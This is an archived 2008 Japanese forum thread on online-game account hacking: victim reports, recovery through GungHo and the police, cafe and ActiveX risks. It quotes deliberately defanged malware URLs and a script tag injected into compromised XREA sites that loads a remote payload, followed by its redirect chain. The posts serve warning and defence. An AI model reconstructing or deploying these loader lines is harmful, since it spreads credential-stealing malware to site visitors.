http://209.85.175.104/search?q=cache:22YqIUd7XrkJ:pc11.2ch.net/test/read.cgi/sec/1172583844/924-944+Hupigon13&hl=ja&ct=clnk&cd=15&gl=jp

571 名前:566:08/08/01 18:01 ID:ENkZpZCUO
出先なので、携帯から失礼します。

>>568-570

わざわざリンクまで貼っていただき、ありがとうございます。
レジストリを弄る、との事なので少々不安ですが、念のためバックアップをとってから挑戦してみたいと思います。
ありがとうございました。

572 名前:(○口○*)さん:08/08/03 14:50 ID:jbyv6smI0
>>406です。
無事にデータが復旧されました。
ここや他所を見る限り、復旧されるのはレアケースではなく、マニュアル通りに動けばたいてい復旧まで辿り着けるかと思います。

573 名前:(○口○*)さん:08/08/03 15:50 ID:jO8cY8zg0
おめでd

574 名前:(○口○*)さん:08/08/03 19:40 ID:pzyAVaBM0
俺も今調査してもらってるんだけど、どうやら中華が串つかってやったとかいってた。
もう犯人特定はいいから調査を中断してもらって、さっさとアイテム復旧とか
してもらえないもんかな?

575 名前:(○口○*)さん:08/08/03 20:02 ID:mKF4g38g0
目的が違うだろ、復旧がメインじゃないぞ

576 名前:(○口○*)さん:08/08/03 21:26 ID:5ZO6yI6V0
> 串つかってやった
ここが重要だと思うぞ。
仮に、国内ISPからの接続が行われたのだとするならば、捜査権限が及ぶ範囲内になる訳だし。
直接の摘発にまでは至らなくても、ほいほいと連中の再契約を受け入れる何処ぞのISPへのプレッシャーにはなり得るw

577 名前:(○口○*)さん:08/08/03 21:26 ID:6YwVyS2X0
それは他人だから言えることだな
本人からすれば犯人が捕まっても無一文じゃ事実上強制引退だし復旧のが重要だろ

578 名前:(○口○*)さん:08/08/03 21:32 ID:FF1ijsBQ0
経過を癌のフォームにも投げて、復旧早くしろとせっつけ。

それと同時に警察に対しても、随時進捗確認を行なって、串に利用されたor串を用意した奴にまで辿り着いて貰え。

579 名前:(○口○*)さん:08/08/03 21:34 ID:pzyAVaBM0
>>577
そうなのよ。
他人はやられてないからいいけど
やられた側からしたら犯人はどうでもいいから
とっとと復旧させてほしいんだよね。
不正アクセスの被害にあったって言う調査結果がでたら
ガンホーも復旧してくれるって言ってるし。

自己責任なのに無責任なこと言ってるのは重々承知のつもり。

580 名前:(○口○*)さん:08/08/03 21:38 ID:v8wNHMV90
>574
それは癌に掛け合っての話で、ここで言っても仕方がない。
復旧するのは癌であって、スレ住人じゃないんだし。

このスレの住人が出来る事は
「こまめに問い合わせして、復旧を急いで貰うよう働きかけろ」
ぐらいのアドバイスだけだ。

581 名前:(○口○*)さん:08/08/03 21:46 ID:pzyAVaBM0
Gvで暇防衛だったんでついぐちってしまってすまない。
もう消えるとするよノシ

582 名前:(○口○*)さん:08/08/04 03:08 ID:ImO9XGcy0
PG2をインストしようとすると「Access violation at address 004096DA. Wreite of address 00401000」
としか出ずに先に進めません。
何かお知りの方は居ませんか?

583 名前:(○口○*)さん:08/08/04 03:13 ID:eAUcB7ut0
エラーメッセージでぐぐった?

584 名前:(○口○*)さん:08/08/04 09:40 ID:/4NXpOWv0
>>582
よくわからないが、MEMTEST86+でメモリチェックした方がよくね?

585 名前:(○口○*)さん:08/08/04 10:44 ID:uA3CSVbu0
【      気付いた日時          】 8/2 夕方頃
【不審なアドレスのクリックの有無 】 なし
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 Yes
【     OS    】 XP SP3
【使用ブラウザ 】 IE6.0
【WindowsUpdateの有無】 毎日
【 アンチウイルスソフト 】 AVG
【その他のSecurty対策 】 Spybot S&D
【 ウイルススキャン結果】 問題なし
【スレログやテンプレを読んだか】 Yes
【hosts変更】有 6月末あたり
【PeerGuardian2導入】無
【説明】 上記の時間に「別のIDでログイン」という形で落とされすぐにログイン>また入られるを5回ほど繰り返し
サブPCのほうでガンホゲームズからPASS等すべてを変更して何とかなりました。
日曜日は問題なかったです。

1.5倍期間に○活空間のネカフェを利用その際ウィルスチェックは行っていませんでした。
同じ期間に利用していた友人も別の店舗ではありますが垢ハックの被害にあっています・・。
やはりネカフェ利用の際はウィルスチェックとPASS変更は怠っちゃいけないですね。

586 名前:(○口○*)さん:08/08/04 11:23 ID:OwKxb6g50
というか、その危ないネカフェをどんどん晒せる場所があればいいんだけれどね。
ひとまず被害が増えないようお店に報告しましょう。

チェーン店なら、店舗でなく元締めの方にいれると。

587 名前:(○口○*)さん:08/08/04 12:29 ID:YZI2a9AW0
全てのネカフェが危険なのは変わりないし、晒しってやつは捏造が入りやすいから微妙だな。

588 名前:582:08/08/04 12:39 ID:ImO9XGcy0
エラーメッセージでぐぐって調べれる限りの対策(HDD容量、Div更新等)はしたのですが分かりませんでした
MEMTEST86+はUSBを起動ディスクにして試しましたが、これも良く分かりません

【      気付いた日時          】 8/3
【不審なアドレスのクリックの有無 】ROM776に貼り付けられたハックアドレス
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 No
【     OS    】XPsp2ver2002
【使用ブラウザ 】 Firefox 2.0.0.16
【WindowsUpdateの有無】 半年前
【 アンチウイルスソフト 】 無
【その他のSecurty対策 】 NOD32
【 ウイルススキャン結果】まだです
【スレログやテンプレを読んだか】 今から読みます
【hosts変更】無 
【PeerGuardian2導入】無
【説明】 (被害状況を詳しく書く)
掲示板の垢ハックと思われるアドレスを踏みました
現在記事が削除されてしまった+履歴に残っていないのでアドレスは分かりません
感染したと思われるPCはオフライン状態にして携帯で垢IDpassを変更して、今は知人宅のPCから操作しています

589 名前:(○口○*)さん:08/08/04 13:04 ID:YZI2a9AW0
>>588
ハックアドレスを踏んだと分かってるのなら、PG2の導入は置いておいて
まずウイルススキャン(できればOS再インストール)をやらないと駄目。
とにかくPCを安全な状態に戻すのが最優先。

590 名前:(○口○*)さん:08/08/04 13:47 ID:TuIFve/00
誰も触れてないけど、GameGuardが動作してると特定のインストーラが
そのエラーを吐いて動作しない。

591 名前:(○口○*)さん:08/08/04 14:00 ID:ImO9XGcy0
spybotでの検査結果が8件

Windows Security Center.FirewallDisableNotify: 設定 (レジストリ変更, nothing done)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify!=dword:0
Windows Security Center.AntiVirusDisableNotify: 設定 (レジストリ変更, nothing done)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify!=dword:0
Advertising.com: トラッキングcookie (Firefox: default) (Cookie, nothing done)
Advertising.com: トラッキングcookie (Firefox: default) (Cookie, nothing done)
Advertising.com: トラッキングcookie (Firefox: default) (Cookie, nothing done)
Advertising.com: トラッキングcookie (Firefox: default) (Cookie, nothing done)
Avenue A, Inc.: トラッキングcookie (Firefox: default) (Cookie, nothing done)
DoubleClick: トラッキングcookie (Firefox: default) (Cookie, nothing done)

NOD32では感染オブジェクト0件でした。
これからクリーンインストールをしてみます

>>590
nProの事でしょうか?

592 名前:(○口○*)さん:08/08/04 14:04 ID:vjl1vknj0
NODは割りとザル、軽いだけだな…

593 名前:(○口○*)さん:08/08/04 17:00 ID:CLyiVNmh0
Trojan.Win32.Inject.dzc
とかmixiにも良く張られているけれど、
あれというのは張った本人が自らの意思で張っているん?
それともウィルスがイタズラした結果なんだろか?

594 名前:(○口○*)さん:08/08/04 17:28 ID:OwKxb6g50
>>593
怪しいリンクを貼り付けていく奴?ならアカウントハックと見て良いよ。
オイタしたIDをNGにかけていくと、前に登録したIDがなくなっている事もある。

595 名前:(○口○*)さん:08/08/04 17:31 ID:CLyiVNmh0
なるほど悪意の書き込みなのね。

596 名前:(○口○*)さん:08/08/04 17:59 ID:/4NXpOWv0
>>593
投稿者に問い合わせると、見に行った事もないという返答が帰ってきたりする。

mixiの垢ハックして、特定のキーワードに反応する記事に自動コメントをつけにいく形だよ。
悪意のある投稿者は、投稿者のパスをハックした業者(?)だと思っていた方がいい。

運営に通報すると同時に、投稿者のプロフや日記を見て、普通だったらそっちにも報告入れるとベスト。
投稿者の人が、mixiのアカハック除去してパス変更しない限り(または運営がそのIDを停止しない限り)
余所で繰り返される事になるから。

597 名前:L ★:08/08/04 19:50 ID:???0
203.152.211.10*.static.zoot.jp
889 名前:(^ー^*)ノ〜さん[] 投稿日:08/08/04(月) 12:19 ID:4663ST910
http://www◎gaimima130◎com◎2◎jpg
ラグナロクオンラインがDSのゲームになるのかぁ
レベル60くらいまでやってた自分としては[興味があります。

598 名前:(○口○*)さん:08/08/04 20:48 ID:pYDGKpXn0
ただの画像じゃんか

599 名前:(○口○*)さん:08/08/04 20:50 ID:/4NXpOWv0
>>597
報告ありがとうございます。削除依頼スレに出てた「ウィルス詰め合わせサイトと思わしきurl」という奴ですね。
ttp://www■gaimima130■com/2■jpg

「www■gaimima130■com」→「61■139■126■15」
案の定、中国のアドレスのようですが・・・ファイルそのものは、普通にJpegっぽいです。
Virustotalでも0/36。襟元のスカーフっぽいものが写ってるだけの画像。ロゴを見る限りではアダルト系?

投稿した人はなにをしたかったんでしょうね。

600 名前:(○口○*)さん:08/08/04 20:53 ID:/4NXpOWv0
(追記)

危険な可能性のあるファイルとして、一応、バイナリエディタで覗いて、JPEGであることを確認してから
ファイルを開いています。なにも考えずに開いちゃったりはしていません。

601 名前:(○口○*)さん:08/08/04 21:25 ID:4vR7GSF40
>>600
JPEG展開コードに脆弱性があった場合、それでは防げないのでは。

602 名前:(○口○*)さん:08/08/04 21:30 ID:/4NXpOWv0
>>601
その通り。その辺は、言い出したらきりがないので、自己責任のリスクをできる範囲で減らしていくことが重要ですってだけ。

603 名前:591:08/08/04 22:14 ID:ImO9XGcy0
無事再インストールを済ませ、カスペ先生を導入しました
avp.exeでハングアップしかけてしまいましたが…

ご相談に乗っていただいてありがとうございました

604 名前:まとめ臨時 ◆kJfhJwdLoM:08/08/05 04:31 ID:ufdYnDKJ0
>>597 >>599
ちょっと前に>>369で報告があったドメインだったりします。

ソースチェッカーでドメイン名をそのまま掛けてみると
ぱっと見ソースでgifファイルやら気になりましたが
枠外にwww■gaimima130■com/wmv■exeの文字。
ウイルス入りのものでもダウンロードさせる…のかな…とか。

605 名前:(○口○*)さん:08/08/05 04:34 ID:PTP63PB+0
ROM776の削除されたものは>>369のlivedoormだったですね。
文面は>>597でした。

606 名前:(○口○*)さん:08/08/05 09:27 ID:M4yphMwf0
アカウントハッキングがこれだけ蔓延しているのに、捕まえられないってもどかしいもんだな。

607 名前:(○口○*)さん:08/08/05 17:03 ID:UNuiEioa0
なんかwikipediaがブロックされないから変だと思って調べたら、
全部かどうか知らんけどサーバーがアメリカになったのね。
混乱する人いるかもしれないから一応報告。

608 名前:(○口○*)さん:08/08/05 17:49 ID:sK92qw4Y0
OpenDNSでも使ってるのかい

609 名前:607:08/08/05 18:39 ID:UNuiEioa0
書き忘れ、PG2での話ね。
既出だったら申し訳ない。

610 名前:まとめ臨時 ◆kJfhJwdLoM:08/08/05 19:51 ID:aP9Q2lEd0
リネージュ資料室さんの
セキュリティ対策(ウィルス情報-ウィルス更新状況)から
www■excite-blog■com(2008/08/04 11:22:29)の[script]のデータ部分で
こんな感じの抜き出しがありました。いくつか抜粋。

adimp■excite■co■jp
image■excite■co■jp/jp/css/top/images/08headerDPbg■gif
(中略)
mage■excite■co■jp/jp/top/front/MenuBars■jpg
image■excite■co■jp/jp/top/front/mPageArr■gif
image■excite■co■jp/jp/top/front/prDot■gif
image■excite■co■jp/jp/top/front/preview_mode■png
image■excite■co■jp/jp/top/front/qrLine■gif
image■excite■co■jp/jp/top/swf/exciteTopClock■swf
www■excite■co■jp/
www■excite■co■jp/dictionary/

上記URLは本物のエキサイトブログのイメージデータだと思ったのですが
ハックサイトのwww■excite-blog■comが偽装を凝らす為に
本物の最新の画像データやらを直リンクで呼び出しているという事なのでしょうか?

本物のサイトのイメージ画像に罠を混ぜている…なんて事は無いと思うのですが
ちょっと気になったので書き込みまで。

611 名前:(○口○*)さん:08/08/05 19:54 ID:XtOPsC8Z0
>>607
どうりでブロックされなくなったのか

612 名前:(○口○*)さん:08/08/05 20:22 ID:2sVSeoIX0
>>610
罠はない、というかexciteのトップをパクったんじゃないかな。
(ディレクトリなしの)ルートにアクセスして
(aguseなどに投げて)確認する奴のために
本物のexciteを装ってるんでしょ。

613 名前:(○口○*)さん:08/08/05 21:59 ID:tuSIlzzd0
先ほどRO終了時に下のサイトが表示されたました、セキュリティーのダウンロードを促してきたのですが
怖かったので直ぐ×で閉じたのですが、有害URLかわかりません。
どなたか判別していただけないでしょうか

http://supashuri■com/soshi/index■php?52510-c0e54-43165-2050a-0c553-95f57-6e0e1-3541f-0b085-05f5b-00485-f5714-09560-50143-59050-a5007-17100-80f57-13555-c5952-40541-53b50-0c560-a0c02-000b5-a6c00-03510-33e05-53020-75044-41045-10b01

614 名前:(○口○*)さん:08/08/05 22:18 ID:rEUZjZLa0
■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■

615 名前:(○口○*)さん:08/08/05 22:36 ID:nA1OnDRQ0
>>613
自己責任で判断しろや。

ttp://supashuri■com -> USのIP
ちなみにカスペ入ってる状況でそのアドレスを落とそうとすると、「フィッシング攻撃」として警告されます。


偽セキュリティソフトの押し売りに注意
http://secure.blog.ocn.ne.jp/column/2008/02/post_65bb.html

偽セキュリティーソフトにご用心
http://www.yomiuri.co.jp/net/security/goshinjyutsu/20071009nt0e.htm

記者も体験,偽セキュリティ・ソフトのだましの手口
http://itpro.nikkeibp.co.jp/article/OPINION/20060627/241921/

616 名前:(○口○*)さん:08/08/05 23:29 ID:4Pn5Zagr0
今日のメンテで復旧してもらいました
1月31日 AVASTがあるからと安心して掲示板からURLを踏んで感染(2月1日にあれだったんじゃないかと思いウイルスバスター体験版で検索して見つかりました)
2月1日 朝起きてInすると装備・Zenyがほぼ空。プロの露店で自分の名前入りジルタス仮面もあったことからアカハクと確信。すぐにガンホーに捜査依頼。
2月2日 サイバー課に電話し、状況を説明すると最寄の警察所へ状況を説明し連絡を入れさせると言われる
2月5日 最寄の警察署から電話。初めての事例で良く分からないから来てくれとのことで出向く。 生活安全課の方にガンホーID、PASS。ラグナロクID、PASS。その他個人情報を伝え「何かつかめたら連絡する」と言われる
2月12日 警察からあなたのISPに問い合わせるのに資料が必要だから持って来いと言われ30分かけて行くも「やっぱり使わないわ」
5月?日 忘れられているのではないかと思いこちらから電話。ガンホーと協力しているが相手のIPがつかめず捜査が難航しているからもう少し待って欲しいと言われ待つ。
7月下旬 いい加減いいんじゃないかな?と電話すると「犯人の特定は不可能だからそれは諦めてくれ、担当がいないからかけ直させる」とのことで2日ほど待つと、
「この前捜査は終ってた。不正アクセスがあったのは間違いないだろうからガンホーに連絡しておくね。これで捜査打ち切りだから」
これを聞きガンホーのヘルプデスクに投稿。

「そのようでございましたら、弊社担当者よりご相談いただいた警察機関へ
ご連絡させていただきますので、
以下の情報に関して、ご連絡をいただけますよう、お願いいたします。」

協力して捜査してたんじゃないのか?と思ったが警察機関だけを伝え今日まで放置。

8月5日18時20分 復旧完了と投稿内容を通じて運営から返答

向こうも忙しいのか捜査が完了していても連絡してくれないようです。1ヶ月に1度くらいなら連絡してもいいのではないでしょうか。

きちんと捜査していただけるようなので被害に合われた方は泣き寝入りせず連絡することをおすすめします。
駄文ですがみなさんのお役に立てば幸いです

617 名前:(○口○*)さん:08/08/06 08:59 ID:oe43ZD+W0
>ガンホーID、PASS。ラグナロクID、PASS

パスワードは誰にも教える必要ないし、教えてはならんのでは…。

618 名前:(○口○*)さん:08/08/06 12:40 ID:xmms1cUX0
丸々7ヶ月かぁ・・・

619 名前:(○口○*)さん:08/08/07 12:39 ID:VNne+QWd0
やっぱり垢ハクの対応は警察署次第ってことか

620 名前:(○口○*)さん:08/08/07 12:55 ID:NbakvONu0
警察次第というか、刑事事件だからって丸投げしたら
誰も頑張ってくれないと思う

621 名前:(○口○*)さん:08/08/07 14:40 ID:V/KO1MvR0
警察は忙しいから、ちょっとくらい邪魔と思われても連絡して大丈夫
むしろ掛けないと忘れられるほうが多い

毎週決まった曜日(できれば週中の朝一と昼以外。金〜月はわりと忙しそう)に
状況を教えてください→1〜2分聞く→何かあったらご連絡ください。また来週電話します、と伝える
これで次回予告ができるから進展あってもなくても掛ける口実になるし
進展ないなら無いでもいいから話を聞きたいと伝えておけば断られない

職場の都合で週40通位、国内の刑事課(盗犯課多め)の人と書類のやり取りをしてたが
年末年始だったり都心部じゃなければ電話もできないほど忙しくはないよ
(ニュース等の大捜索とかやってたら別、とはいっても担当者が決まってるなら遠慮しなくてOK)
山の手沿線でも忙しいところとそうでないところははっきり別れてた位だし気にしないで大丈夫

622 名前:(○口○*)さん:08/08/07 14:53 ID:yL+2/vgs0
そりゃ普段から忙しかったら、何かあって処理能力超えたら問題になるしね。

623 名前:(○口○*)さん:08/08/07 15:28 ID:ZHFeoIln0
毎日とかはさすがに邪魔になるだろうけど、週イチくらいなら、
むしろ積極的に問い合わせと確認したほうがいいんじゃね。
問い合わせが多ければ警察側の今後の腰の入れ方も変わってくるだろうし。

624 名前:(○口○*)さん:08/08/07 23:27 ID:g25tCCNl0

ttp://www.gungho.jp/index.php?module=Page&action=NoticeDetailPage¬ice_id=1255

>オンラインゲームのログイン方法が変わります 2008/08/06

>いつもガンホーゲームズのオンラインゲームをご愛顧いただきましてありがとうございます。
>ガンホーゲームズではユーザーの皆様に、よりわかり易いゲームプレイ環境を提供させていただくため、
>オンラインゲームへのログイン方法を「Web上からGungHo-IDひとつでログイン」
>できる方法へ順次変更させていただきます。

>変更されるタイトルと変更日は?

>▼ログイン方法が変わるタイトル/変更予定日
>タイトル 変更予定日時
>エミル・クロニクル・オンライン 2008年8月21日(木)15:00
>覇拳伝 2008年8月21日(木)15:00
>ドデカオンライン 2008年8月28日(木)15:00
>TANTRA 2008年9月03日(水)15:00
>ラグナロクオンライン 2008年8月下旬 〜 2008年9月下旬
>北斗の拳ONLINE 未定
>ヨーグルティング 未定

>また、2008年8月21日より一部ガンホーのサービスに関する用語も変更させていただきます。
> 変更前:GungHo-ID  ⇒    変更後:ガンホーID
> 変更前:アトラクションID  ⇒   変更後:ゲームアカウント

>※ 本内容は用語のみの変更となります。変更後もお客様のGungHoーID文字列は変更されません。
> GungHo-IDの現在の英数字の文字列がそのままご利用いただけます。
> また、アトラクションIDを複数お持ちの場合には全て継続してご利用いただけますので、
> ご安心ください。ログイン方法は後日ご案内いたします。
>※ 本変更導入期間の前後に実施される一部のキャンペーンや販売チケットにおいて、
> 変更後の用語で表記されていただく場合がございます。ご了承ください。
>※ 本変更にともない、各ゲームのプレイ必要環境にInternetExplorer6.0以上が必要となります。
> 他のブラウザでも利用できる場合がありますが、上記ブラウザのみをサポート対象とさせていただきます。

ハンゲとかの方式になるんかよ。ActiveX使用だからセキュ的に嫌なんだよなぁ…

625 名前:(○口○*)さん:08/08/07 23:39 ID:NbakvONu0
ポータル不人気だからって強制誘導かよ

626 名前:(○口○*)さん:08/08/08 01:26 ID:sScipx4s0
癌IDまで垢ハックされるようになるわけか

627 名前:(○口○*)さん:08/08/08 01:42 ID:oLrXgoId0
強制的にIE使えってことかよ…
IETabを使えばFirefoxも対応可能だけどさ

強制的にIE使えってのが一番もにょる。

628 名前:(○口○*)さん:08/08/08 01:44 ID:h5Peya/60
アカウント切り替えるたびにクラ再起動とかは避けてほしいなぁ。

629 名前:(○口○*)さん:08/08/08 03:00 ID:+0c9X5Da0
あぁ、IETab入れないでやってきたが、仕方ないな。

630 名前:(○口○*)さん:08/08/08 03:10 ID:XXE+EpXf0
アカハック対策としてActiveX と Java applet をOFFにしてる俺にとって
ActiveX必須になる変更は武装解除命令に等しい。

631 名前:(○口○*)さん:08/08/08 04:04 ID:7JtEpvcd0
折角落ち着いてきたのに、またVistaの整合性レベルでgdgdになりそうだな。
それに加えて、導入後は癌ポータルのフィッシングサイトが出てくるのではなかろうか。
DNSの脆弱性も影響力が強まるだろうし、困った物だ。

632 名前:(○口○*)さん:08/08/08 04:32 ID:1pUhL2ev0
>>624
うわー、この方式嫌いなんだよ…

633 名前:(○口○*)さん:08/08/08 11:25 ID:d+Iyy16x0
ハンゲはOperaでも動くからいいが
癌のはどうせIEでしか動くまい…

634 名前:(○口○*)さん:08/08/08 11:26 ID:AFYPkEtF0
Operaって外部プログラム起動できる仕組み持ってるの?
Firefoxはプラグインがあるけれど。

635 名前:(○口○*)さん:08/08/08 11:29 ID:jZiVVKuT0
抗議の投稿しまくれば現在の形式のままにしてくれるかもしれないぜ…
俺はそれに期待するわ…

636 名前:(○口○*)さん:08/08/08 11:48 ID:0iH03vjp0
>>634
一応右クリメニューにIEで開くが追加できる

637 名前:(○口○*)さん:08/08/08 12:00 ID:1pUhL2ev0
>>634
OperaもSafariもNetscapeプラグイン動くでしょ。Fxと同様に。
# じゃなきゃFlash再生すらできない。

638 名前:(○口○*)さん:08/08/08 12:10 ID:AFYPkEtF0
>>637
Firefoxの場合は、プラグインが「非公認」だと胡散臭さ満点になるよ。
ActiveXなら署名で判断できるけれどね。

ま、対応しないだろうけれど。

639 名前:(○口○*)さん:08/08/08 12:18 ID:1pUhL2ev0
Netscapeプラグイン自体がそういう古い仕組みなんだからしゃーない。
AppleとMozillaとOperaあたりでActiveXコントロールと
せめて肩を並べる仕組みを作れんもんかねぇ。

640 名前:(○口○*)さん:08/08/08 12:31 ID:sReaFTxJ0
>>639
AppleとMozillaとOperaが肩を並べて標準規格を定めても
天下のMSサマは独自路線を貫きます(例:JavaScript)

641 名前:(○口○*)さん:08/08/08 12:44 ID:7JtEpvcd0
>>638,639
Mozilla界隈は署名のような仕組みを作らずとも、MPLによるソース公開で同一性を担保していく事になるんでね。
実質はMPL/GPL/LGPLの多重派生になるから、考えようによってはバイナリ署名より堅苦しいかも知れないけれど。

642 名前:(○口○*)さん:08/08/08 15:11 ID:1pUhL2ev0
その公開されているソースコードと、今ユーザが入れている(あるいは入れようとしている)
プラグイン(あるいはソースコード)が同一であることの検証を「ブラウザが」「自動で」
やってくんないと話になんないんすよ。
日本語の次に得意な言語はCです、なんて言うようなアレゲな界隈の人と違って。

643 名前:(○口○*)さん:08/08/08 15:28 ID:F02LD81T0
ソースのハッシュを見ても意味ないしな…

644 名前:(○口○*)さん:08/08/08 19:37 ID:FKlEnrFn0
ActiveXがウイルスチェッカー反応しまくりな作りだったりして

645 名前:(○口○*)さん:08/08/08 20:03 ID:OkuwCdAX0
ネカフェじゃもう危なっかしくてプレイできねーな。
癌IDがハック対象になるから、帰宅までの時間も稼げやしねぇ。

646 名前:(○口○*)さん:08/08/08 20:52 ID:+0c9X5Da0
問題の端末を見つけたとき、ガンホーにも苦情入れた方がいいのかもしれんね。
公認カフェの端末に垢ハックのプログラムが入っていたら、かなり問題あるし。

647 名前:(○口○*)さん:08/08/08 21:31 ID:du/FjHNS0
癌に言って何とかなる物じゃないだろ

648 名前:(○口○*)さん:08/08/08 22:20 ID:+0c9X5Da0
問題のある公認カフェがある、って苦情がガンホーの参考に
ならなかったら本当の屑会社じゃないか。

649 名前:(○口○*)さん:08/08/08 22:37 ID:du/FjHNS0
どういう事を期待しているのかさっぱりわからない

650 名前:(○口○*)さん:08/08/08 22:40 ID:h5Peya/60
公認取り消しで十分じゃない?
公認ネカフェに特権がある現状、公認でなくなることは
RO目当ての客足が多少なりとも遠のくわけだから
ネカフェにとっても意味のあるペナルティだと思うけど。

651 名前:(○口○*)さん:08/08/08 23:09 ID:+0c9X5Da0
公認てのは、ガンホーのお墨付きってことだからね。
そこで垢ハックがあれば問題ありすぎるよ。

652 名前:(○口○*)さん:08/08/08 23:13 ID:du/FjHNS0
まずはその店舗と本社、それでしばらくしても改善されないならアリかもしれないけど
いきなり癌に公認取り消せとかってのはクレーマー過ぎないか?

653 名前:(○口○*)さん:08/08/08 23:18 ID:+0c9X5Da0
ガンホーに報告しなかったら内々で済ませておわっちゃうでしょ
だから連絡するんだよ

654 名前:(○口○*)さん:08/08/08 23:30 ID:t8lSV6NV0
>>652
いやいやいきなり公認取り消せと言うんじゃなくて
問題があると癌に苦情入れれば公認が取り消されるかもって話だから

655 名前:(○口○*)さん:08/08/08 23:31 ID:h5Peya/60
>>652
段階踏むのは当然として、最終的に「対処されないなら公認取り消しを期待」。
対処されればそれでよし、公認取り消されれば行くこともなくなるから
(地域によっては不便になるけど)それもまたよし。

656 名前:(○口○*)さん:08/08/09 02:32 ID:xUyroPuL0
つーか、ネカフェでROをやらなければいいんじゃね?

どうしてもネカフェ限定Dやらで遊びたいなら、携帯端末から癌IDを
変更出来る環境にするしかないのかも。

IE6以上搭載の携帯端末ってEeePCやWillcomD4ぐらいな気が
しないでもないが……

657 名前:(○口○*)さん:08/08/09 02:58 ID:37o0L1mv0
いまどきの携帯電話にはフルブラウザというのがあってだな

658 名前:(○口○*)さん:08/08/09 03:48 ID:buMkOlHZ0
して携帯のフルブラウザはActiveXが動くのかね。
そう遠くないうちにActiveX動作環境じゃないと癌IDにもログインできなくなるんだぜ。

659 名前:(○口○*)さん:08/08/09 04:42 ID:nP1G4p460
ネカフェでやりたいなら自前のノートPC持っていってつなぐとか
垢ハク系のウイルスならLANつないだくらいなら感染しないと思うし。

660 名前:(○口○*)さん:08/08/09 07:21 ID:t6ZjKs770
実装のしかたによっては2PC組死亡だよな、これ。

661 名前:(○口○*)さん:08/08/09 07:22 ID:v13IUzO70
そもそも癌IDごと抜かれたら携帯使おうがどうしようが無駄な気がするんだが

662 名前:(○口○*)さん:08/08/09 10:09 ID:4/QBXae+0
jpg偽造垢ハクURLをjaneなど専用ブラウザで開いた場合でも感染する事はあるのでしょうか?

663 名前:(○口○*)さん:08/08/09 11:48 ID:o3qYEOW10
あるかないかなら「ある」

664 名前:(○口○*)さん:08/08/09 12:01 ID:0bqYHXRn0
いつも右クリックで一旦保存して、ウイルススキャンしてから開くなぁ

665 名前:(○口○*)さん:08/08/09 12:22 ID:W/yEfU9P0
難しい質問だね
画像ファイルに関して、現在「既知で未修正の脆弱性」ってあるの?

666 名前:(○口○*)さん:08/08/09 12:27 ID:S0oEzj1m0
未知の脆弱性が否定できないから>>663

667 名前:(○口○*)さん:08/08/09 13:06 ID:0MNaemeK0
まーたXREAがやばいらしい。複数サイトで確認。
犯人は6月の広告改ざんと同一(サーバは同じでポートだけと違う(81→88))。

793 :名も無き軍師:08/08/07 22:04:32
 さきほど気付いたのですが、8月2日23時45分頃〜今まで、
 テンプレサイト内のほぼ全ページに、
 謎のスクリプトが、仕込まれてしまっていたようです。
 仕込まれていたのは、下記のようなものです。
 <script src= h t t p : // 1039045744 : 88 / jp.js ></script>
 ↑↑危険かもしれないので、一部スペースを入れ、アクセスできないように書いています。

668 名前:(○口○*)さん:08/08/09 13:38 ID:L1hg5O7a0
>>667

h t t p : // 1039045744 : 88 / jp.js
→ h t t p : // 1039045744 : 88
→→ h t t p : // 1039045744 : 88 / show.php
→→ http://ct2■shinobi■jp/sc/1107966

height=0 な辺りが、とても胡散臭いですね。

669 名前:(○口○*)さん:08/08/09 15:50 ID:W/yEfU9P0
ttp://pc11.2ch.net/test/read.cgi/hosting/1214916712/466

466 名無しさん@お腹いっぱい。 sage 2008/08/09(土) 15:04:59

同人板XREAスレにも注意勧告北

※注意願います※
8/2頃からXREAサーバー利用者のサイトへの攻撃が再度確認されています。
今回の攻撃はサイトのhtmlソースを直接改変し罠サイトへの強制アクセススクリプトを仕込むというもの。
アクセス先は6月の罠広告に使われたウィルス置き場と同一です。

現在のところ被害報告は特定オンラインゲームの情報を取り扱うサイトのみですが、
ID・パスの漏洩によるものかARPスプーフによるものか原因が確定していません。
後者の場合、XREAサーバーにHPを持つサイトの多く(サイトの内容関係なく)が汚染されている可能性があります。

管理者の皆様、特にここ最近更新をさぼっている・放置しているサイト管理者は
ソースのチェック等対策をよろしくお願いします。

670 名前:(○口○*)さん:08/08/09 16:35 ID:FcuYoj+a0
>>667
これ前回の広告にウィルス混入されてた時よりやばいんじゃね。
今度は広告じゃなくてウェブ上に置いてあったファイルのソースコードを直接書き換えられたらしいし。
無料、有料スペース関係なくxrea全体で感染の危険有りだぞ。

671 名前:(○口○*)さん:08/08/09 17:53 ID:0MNaemeK0
>>670
かなりやばそうですねぇ。
FFのコミュミティの1つに
ttp://yy28.60.kg/ff11jobjobplus/
というジョブ別の板がある。
FFには20ほどジョブがあり、ジョブ別の各スレのうち
テンプレサイトにXREAを使っているのは
4つ(サーバはバラバラ。netbenriもXREA)で、
その全てがやられている。
犯人はその気になればXREAの全て(あるいはいくつか)のレンサバの
全てのコンテンツに好きな注入ができるものと思われる。

広告の時にバックドアでも仕掛けられたのか、
広告の時の穴がそのままなのか、後者ならさくらの時か…?

672 名前:(○口○*)さん:08/08/09 17:57 ID:ToB7YhNC0
もうやめてー;;
xれあのHPはゼロよ!

673 名前:(○口○*)さん:08/08/09 18:00 ID:0MNaemeK0
2ch同人板XREAウイルススレより

※注意願います※
8/2頃からXREAサーバー利用者のサイトへの攻撃が再度確認されています。
今回の攻撃はサイトのhtmlソースを直接改変し罠サイトへの強制アクセススクリプトを仕込むというもの。
アクセス先は6月の罠広告に使われたウィルス置き場と同一です。
現在のところ被害報告は特定オンラインゲームの情報を取り扱うサイトのみですが、
ID・パスの漏洩によるものかARPスプーフによるものか原因が確定していません。
後者の場合、XREAサーバーにHPを持つサイトの多く(サイトの内容関係なく)が汚染されている可能性があります。
管理者の皆様はソースのチェック等対策をよろしくお願いします。

674 名前:まとめ臨時 ◆kJfhJwdLoM:08/08/09 18:49 ID:si0TyLsV0
資料室さんのウイルス更新データを見つつ
オリンピック始まる二日ぐらい前から
件数が少なくなってきた事を体感で感じていたのですが、
